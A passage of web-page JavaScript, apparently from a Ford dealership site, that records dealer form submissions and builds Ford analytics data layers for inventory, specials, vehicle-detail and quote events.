</script> <script> (function() { if (!Element.prototype.matches) { Element.prototype.matches = Element.prototype.msMatchesSelector; } var forms = document.querySelectorAll(".c-df9f860f-c8d9-4d76-a87a-5af65b75c03b form"); for (var i = 0; i < forms.length; i++) { (function() { var form = forms[i]; var formId = form.dataset.formId; var formType = form.dataset.formType; var submitButtons = form.querySelectorAll(".c-da5f7112-adbc-43c0-8f9a-621524a17919"); for (var j = 0; j < submitButtons.length; j++) { var submitButton = submitButtons[j]; submitButton.addEventListener("click", function() { var fields = {}; var elements = form.elements; for (var k = 0; k < elements.length; k++) { var element = elements[k]; var fieldType = element.dataset.fieldType; if (fieldType != null) { var value = undefined; var add = false; if (element.type === "radio") { if (element.checked) { value = element.value; } } else if (element.type === "checkbox") { if (element.checked) { value = element.value; add = true; } } else { value = element.value; } if (value !== undefined) { if (add) { if (fields[fieldType] == null) { fields[fieldType] = []; } fields[fieldType].push(value); } else { fields[fieldType] = value; } } } } window.jzaq.push(['FORM.SUBMITCLICK', { provider: "Rocket", formId: formId, formType: formType, formNode: form, fields: fields }]); }); } })(); } })(); </script> <script> (function() { if (!String.prototype.startsWith) { String.prototype.startsWith = function(search, pos) { return this.substr(!pos || pos < 0 ? 0 : +pos, search.length) === search; }; } function jzlFordDtmBuildDataVars( jzlAnalyticsObject, options ) { options = options !== undefined ? options : {}; var vars = {}; var ford = jzlAnalyticsObject['ford']; var prefix = ford['prefix']; var pageName = ford['page_name']; var countryCode = ford['country_code']; vars[ 'c5' ] = ford[ 'onclick' ]; vars[ 'pev2' ] = ford[ 'onclick_link_name' ]; vars[ 'v1' ] = ford[ 'pa_code' ]; vars[ 'v2' ] = ford[ 'ford_region' ]; vars[ 'v3' ] = ford[ 'fdaf_code' ]; vars[ 'v4' ] = 'eng'; vars[ 'v6' ] = ford[ 'referred_to' ]; vars[ 'v11' ] = prefix + ":" + pageName; vars[ 'v12' ] = ford[ 'model_year' ]; vars[ 'v14' ] = ford[ 'dtm_client' ]; vars[ 'v15' ] = prefix + ":jazel:" + countryCode; vars[ 'v16' ] = ford[ 'nameplate' ]; vars[ 'v17' ] = ford[ 'cks_visit_id']; vars[ 'v18' ] = ford[ 'body_model_trim' ]; vars[ 'v19' ] = ford[ 'ext_int_color_code' ]; vars[ 'v24' ] = ford[ 'engine_trans' ]; vars[ 'v25' ] = ford[ 'price' ]; vars[ 'v28' ] = ford[ 'kead_type' ]; vars[ 'v35' ] = ford[ 'search_depth' ]; vars[ 'v48'] = ford[ 'tool' ]; vars[ 'v49'] = ford[ 'tool_descriptor' ]; vars[ 'v54' ] = ford[ 'rad_ui_version' ]; vars[ 'ch' ] = ford[ 'site_section' ]; vars[ 'h1' ] = ford[ 'hierarchy' ]; // 'page name' is built by concatenating // v11 (Pagename No Vehicle) and v16 (nameplate) vars[ 'page name' ] = vars[ 'v11' ]; if( vars[ 'v16'] != null && vars[ 'v16' ] !== "") { vars[ 'page name' ] += ":" + vars[ 'v16' ]; } // Apply 'page name' postfix var pageNamePostfix = options.pageNamePostfix; if (pageNamePostfix != null) { vars[ 'v11' ] += ":" + pageNamePostfix; } // 'variant name' is equal to the action name vars[ 'variant name' ] = ford[ 'action_name' ]; return vars; } function jzlFordDtmBuildDatalayer( datalayer, action, vars ) { var jzlFordDtmDatalayerDefsTrigger = {"global-load":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","radUIVersion":":v54","variantName":":variant name"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3"}},"home-load":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","radUIVersion":":v54","variantName":":variant name"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3"}},"si-results-load":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","searchDepth":":v35","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3"}},"si-details-load":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","leadType":":v28"},"event":{"action":"search inventory"}},"payment-estimator":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3"},"event":{"action":"payment estimate|tool"}},"incentive-views":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3"},"event":{"action":"incentive views|tool"}},"get-pre-approved-load":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3"},"event":{"action":"get preapproved|tool"}},"form-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17"}},"no-results-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|tool"}},"test-drive-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|test drive|tool"}},"quick-quote-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","extIntColorCode":":v19","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|quick quote|tool"}},"find-car-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|tool"}},"global-onclick":{"onclick":{"onclick":":c5","onclickLinkName":":pev2"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","engineTrans":":v24","price":":v25"}},"global-overlay":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","radUIVersion":":v54"},"vehicle":{"modelYear":":v12","nameplate":":v16"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3"}},"vrfq-complete":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","extIntColorCode":":v19","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"vehicle quote|lead submitted|tool"}},"window-sticker":{"page":{"tool":":v48","toolDescriptor":":v49"},"onclick":{"onclick":":c5","onclickLinkName":":pev2"},"vehicle":{"modelYear":":v12","nameplate":":v16"},"event":{"action":"window sticker|tool"}},"click-to-call":{"onclick":{"onclick":":c5","onclickLinkName":":pev2"},"vehicle":{"modelYear":":v12","nameplate":":v16"},"event":{"action":"click to call|tool"}},"referral-exit":{"onclick":{"onclick":":c5","referredTo":":v6","onclickLinkName":":pev2"},"vehicle":{"modelYear":":v12","nameplate":":v16"},"event":{"action":"brand referral"}},"global-download":{"onclick":{"onclick":":c5","onclickLinkName":":pev2"},"vehicle":{"modelYear":":v12","nameplate":":v16"}},"payment-estimator-onclick":{"page":{"tool":":v48","toolDescriptor":":v49"},"onclick":{"onclick":":c5","onclickLinkName":":pev2"},"vehicle":{"modelYear":":v12","nameplate":":v16"},"event":{"action":"payment estimate|tool"}},"tool-form-complete":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","extIntColorCode":":v19","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"vehicle quote|lead submitted|tool"}},"get-pre-approved-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3"},"event":{"action":"get preapproved|tool"}},"vehicle-vrfq-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","extIntColorCode":":v19","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|vehicle quote|tool"}},"specials-vrfq-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","extIntColorCode":":v19","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|vehicle quote|tool"}},"vls-vrfq-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","extIntColorCode":":v19","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|vehicle quote|tool"}},"vehicle-details-vrfq-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","extIntColorCode":":v19","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|vehicle quote|tool"}},"confirm-availability-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","extIntColorCode":":v19","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|vehicle quote|tool"}},"vrmi-submit":{"page":{"pageName":":page name","siteSection":":ch","hierarchy":":h1","userLanguage":":v4","pageNameNoVehicle":":v11","client":":v14","site":":v15","tool":":v48","toolDescriptor":":v49","radUIVersion":":v54","variantName":":variant name"},"vehicle":{"modelYear":":v12","nameplate":":v16","bodyModelTrim":":v18","extIntColorCode":":v19","engineTrans":":v24","price":":v25"},"user":{"paCode":":v1","fordRegion":":v2","fdafCode":":v3","cksVisitId":":v17","leadType":":v28"},"event":{"action":"lead submitted|vehicle quote|tool"}}}; var datalayerDef = jzlFordDtmDatalayerDefsTrigger[ action ]; if (datalayerDef != null) { for (var subkey in datalayerDef) if (datalayerDef.hasOwnProperty(subkey)) { var subkeyDefs = datalayerDef[subkey]; var values = {}; for (var fieldName in subkeyDefs) if (subkeyDefs.hasOwnProperty(fieldName)) { var fieldValue = subkeyDefs[fieldName]; if (fieldValue[0] === ":") { var varKey = fieldValue.substr(1); value = vars[varKey]; } else { value = fieldValue; } values[fieldName] = value; } datalayer[subkey] = values; } } return datalayer; } window.jzlAddAnalyticsPostLoadAction(function(jzlAnalyticsObject, action) { var prefix = jzlAnalyticsObject[ 'ford' ][ 'prefix' ]; var pageType = jzlAnalyticsObject[ 'load_page_type' ]; var pageSubType = jzlAnalyticsObject[ 'load_page_sub_type' ]; var isHome = pageType === "page" && pageSubType === "home"; if (action === "AUTO5.INFINITE_SCROLL") { (function() { var foundConditions = jzlAnalyticsObject[ 'srp_found_conditions' ]; var condition = foundConditions.length === 1 ? foundConditions[0] : "all"; var searchedMakes = jzlAnalyticsObject[ 'srp_searched_makes' ] || []; var searchedModels = jzlAnalyticsObject[ 'srp_searched_models' ] || []; var nameplate = ""; if (searchedMakes.length > 0) { nameplate = (searchedMakes[0] + " " + searchedModels[0]).toLowerCase().trim(); } jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vls:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vls:content:infinite scroll"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row20(T)(1c)"); })(); } if (action === "AUTO5_VIEW_TYPE_CHANGED") { (function() { var foundConditions = jzlAnalyticsObject[ 'srp_found_conditions' ]; var condition = foundConditions.length === 1 ? foundConditions[0] : "all"; var searchedMakes = jzlAnalyticsObject[ 'srp_searched_makes' ] || []; var searchedModels = jzlAnalyticsObject[ 'srp_searched_models' ] || []; var nameplate = ""; if (searchedMakes.length > 0) { nameplate = (searchedMakes[0] + " " + searchedModels[0]).toLowerCase().trim(); } jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vls:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vls:content:view"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row20(T)(1c)"); })(); } if (action === "AUTO5.SPECIALS_CLICK") { (function() { var isForm = jzlAnalyticsObject[ 'specials_is_form' ]; var isTerms = jzlAnalyticsObject[ 'specials_is_terms' ]; var modelYear = jzlAnalyticsObject["specials_year"]; var make = jzlAnalyticsObject["specials_make"]; var model = jzlAnalyticsObject["specials_model"]; var nameplate = (make + ' ' + model).toLowerCase().trim(); if (isHome) { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":home:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "home:content:offer details"; jzlAnalyticsObject[ 'ford' ][ 'model_year' ] = modelYear; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row15(T)(1c)"); } else { if (isForm) { jzlAnalyticsObject[ 'ford' ][ 'page_name' ] = "specials:manufacturer incentives:vrfq"; jzlAnalyticsObject[ 'ford' ][ 'site_section' ] = "specials"; jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] = "specials"; jzlAnalyticsObject[ 'ford' ][ 'model_year' ] = modelYear; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-overlay"; fireDtm(jzlAnalyticsObject, "row90(T)(2c)"); } else if (isTerms) { jzlAnalyticsObject['ford']['onclick_link_name'] = prefix + ":specials:manufacturer incentives:content:action:" + nameplate; jzlAnalyticsObject['ford']['onclick'] = "vehicle:action:apr pdf"; jzlAnalyticsObject['ford'][ 'model_year' ] = modelYear; jzlAnalyticsObject['ford']['nameplate'] = nameplate; jzlAnalyticsObject['ford']['action_name'] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row89(T)(1c)"); } } })(); } if (action === "AUTO5.COUPONS_CLICK") { (function() { if (isHome) { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":home:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "home:content:offer details"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = ""; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row15(T)(1c)"); } else { var isPrint = jzlAnalyticsObject['coupon_is_print']; var isDetails = jzlAnalyticsObject['coupon_is_details']; var action; var isHandled = false; var mapping = { "oil-change": { type: "oil change", label: "row114(T)(1c)" }, // row114(T) "brake-service": { type: "brake service", label: "row118(T)(1c)" }, // row118(T) "battery-service": { type: "battery service", label: "row122(T)(1c)" }, // row122(T) "tire-care": { type: "tire care", label: "row126(T)(1c)" } // row126(T) }; var mappedInfo = mapping[pageType]; if (mappedInfo != null) { if (isPrint) { action = "print"; } else if (isDetails) { action = "offer details click"; } else { action = "question submit"; } var mappedPageType = mappedInfo.type; var label = mappedInfo.label; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":service:" + mappedPageType + ":content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = mappedPageType + ":content:" + action; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = ""; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, label); isHandled = true; } if (!isHandled) { if (isPrint) { action = "print"; } else if (isDetails) { action = "view offer details"; } jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":specials:service and parts specials:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "specials:service and parts specials:content:" + action; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = ""; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row87(T)(1c)"); } } })(); } if (action === "AUTO5.GO_TO_SRP") { (function() { if (jzlAnalyticsObject[ 'srp_count' ] === 0) { var foundConditions = jzlAnalyticsObject['srp_found_conditions']; var condition = foundConditions.length === 1 ? foundConditions[0] : "all"; var searchedMakes = jzlAnalyticsObject['srp_searched_makes'] || []; var searchedModels = jzlAnalyticsObject['srp_searched_models'] || []; var nameplate = ""; if (searchedMakes.length > 0) { nameplate = (searchedMakes[0] + " " + searchedModels[0]).toLowerCase().trim(); } jzlAnalyticsObject['ford']['page_name'] = condition + ":si:vls:no results:contact"; jzlAnalyticsObject['ford']['nameplate'] = nameplate; jzlAnalyticsObject['ford']['action_name'] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row49(T)(2c)"); } })(); } if (action === "AUTO5.GO_TO_COMPARE_PAGE") { (function() { var foundConditions = jzlAnalyticsObject[ 'srp_found_conditions' ]; var condition = foundConditions.length === 1 ? foundConditions[0] : "all"; var searchedMakes = jzlAnalyticsObject[ 'srp_searched_makes' ] || []; var searchedModels = jzlAnalyticsObject[ 'srp_searched_models' ] || []; var nameplate = ""; if (searchedMakes.length > 0) { nameplate = (searchedMakes[0] + " " + searchedModels[0]).toLowerCase().trim(); } jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vls:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vls:content:compare"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'page_name' ] = condition + ":si:vehicle compare"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row30(T)(1c)"); })(); } if (action === "AUTO5.VDP_VIEW") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; var vehicleCategory = (jzlAnalyticsObject[ 'vdp_category' ] || "").toLowerCase().trim(); var modelYear = jzlAnalyticsObject[ 'vdp_modelyear' ]; jzlAnalyticsObject[ 'ford' ][ 'page_name' ] = condition + ":si:vehicle details"; jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] = "shopping tools:search inventory-vls"; if (vehicleCategory !== "") { jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] += ":" + vehicleCategory; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] += ":" + nameplate; } } jzlAnalyticsObject[ 'ford' ][ 'model_year' ] = modelYear; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'lead_type' ] = "si:vls"; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "si-details-load"; // Check the flag top see if we just landed on this VDP. // We only fire the event if we didn't do so. // Otherwise, we clear the flag, so that switching to other VDPs will // continue to fire. if (jzlAnalyticsObject[ 'ford' ][ 'is_vdp' ]) { jzlAnalyticsObject[ 'ford' ][ 'is_vdp' ] = false; } else { fireDtm(jzlAnalyticsObject, "row32(T)(11c)"); } })(); } if (action === "AUTO5.REDEEM_INCENTIVE") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; var bodyType = jzlAnalyticsObject[ 'vdp_bodytype' ]; var srpType = pageSubType === "srp" ? "vls" : "vehicle details"; var label = pageSubType === "srp" ? "row28(T)(2c)" : "row38(T)(2c)"; jzlAnalyticsObject[ 'ford' ][ 'page_name' ] = condition + ":si:" + srpType + ":redeem offer"; jzlAnalyticsObject[ 'ford' ][ 'site_section' ] = "search inventory"; jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] = "shopping tools:redeem offer:" + bodyType + ":" + nameplate; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-overlay"; fireDtm(jzlAnalyticsObject, label); })(); } if (action === "AUTO5.WINDOW_STICKER") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; var srpType = pageSubType === "srp" ? "vls" : "vehicle details"; var label = pageSubType === "srp" ? "row23(T)(4c)" : "row46(T)(4c)"; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:" + srpType + ":view window sticker:" + nameplate; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:" + srpType + ":view window sticker:" + nameplate; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:window sticker"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = srpType + ":window sticker"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "window-sticker"; fireDtm(jzlAnalyticsObject, label); })(); } if (action === "AUTO5.CTA_CLICK") { (function() { var modelYear = jzlAnalyticsObject[ 'cta_year' ]; var nameplate = (jzlAnalyticsObject[ 'cta_make' ] + ' ' + jzlAnalyticsObject[ 'cta_model' ]).toLowerCase().trim(); var conditions = jzlAnalyticsObject[ 'cta_conditions' ]; var condition = conditions.length === 1 ? conditions[0].toLowerCase() : "all"; var vehicleCategory = (jzlAnalyticsObject[ 'cta_bodytype' ] || "").toLowerCase(); var actionType = jzlAnalyticsObject[ 'cta_actiontype' ]; var srpType; if (pageSubType === "srp") { srpType = "vls"; } else { srpType = "vehicle details"; } if (actionType === "form") { (function() { var label; var actionCode; var pageNamePostfix = null; var hierarchyCode; var sectionCode; var ctaLabel = (jzlAnalyticsObject[ 'cta_label' ] || "").toLowerCase(); if (pageSubType === "srp") { if (ctaLabel === "text us") { actionCode = "text us"; hierarchyCode = "text us"; sectionCode = "search inventory"; label = "row26(T)(2c)"; } else { actionCode = "vrfq"; hierarchyCode = "get quote"; sectionCode = "get quote"; label = "row21(T)(2c)"; } } else { if (ctaLabel === "text us") { actionCode = "text us"; hierarchyCode = "text us"; sectionCode = "search inventory"; label = "row36(T)(2c)"; } else if (ctaLabel === "confirm availability") { actionCode = "confirm availability"; hierarchyCode = "confirm availability"; sectionCode = "search inventory"; label = "row40(T)(2c)"; } else { actionCode = "vrfq"; pageNamePostfix = "vin"; hierarchyCode = "get quote"; sectionCode = "get quote"; label = "row34(T)(2c)"; } } jzlAnalyticsObject[ 'ford' ][ 'page_name' ] = condition + ":si:" + srpType + ":" + actionCode; jzlAnalyticsObject[ 'ford' ][ 'site_section' ] = sectionCode; jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] = "shopping tools:" + hierarchyCode; if (vehicleCategory !== "") { jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] += ":" + vehicleCategory; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] += ":" + nameplate; } } jzlAnalyticsObject[ 'ford' ][ 'model_year' ] = modelYear; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-overlay"; fireDtm(jzlAnalyticsObject, label, { pageNamePostfix: pageNamePostfix }); })(); } else if (actionType === "edmunds-sms") { (function() { var label; if (pageSubType === "srp") { label = "edmunds sms srp (2c)"; } else { label = "edmunds sms vdp (2c)"; } jzlAnalyticsObject[ 'ford' ][ 'page_name' ] = condition + ":si:" + srpType + ":edmunds sms"; jzlAnalyticsObject[ 'ford' ][ 'site_section' ] = "search inventory"; jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] = "shopping tools:edmunds sms"; if (vehicleCategory !== "") { jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] += ":" + vehicleCategory; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] += ":" + nameplate; } } jzlAnalyticsObject[ 'ford' ][ 'model_year' ] = modelYear; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-overlay"; fireDtm(jzlAnalyticsObject, label); })(); } })(); } if (action === "AUTO5.VDP_IMAGE_GALLERY_FULLSCREEN") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action:" + nameplate; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:fullscreen photo"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.BACK_TO_SEARCH_RESULTS_VDP") { (function() { var nameplate = 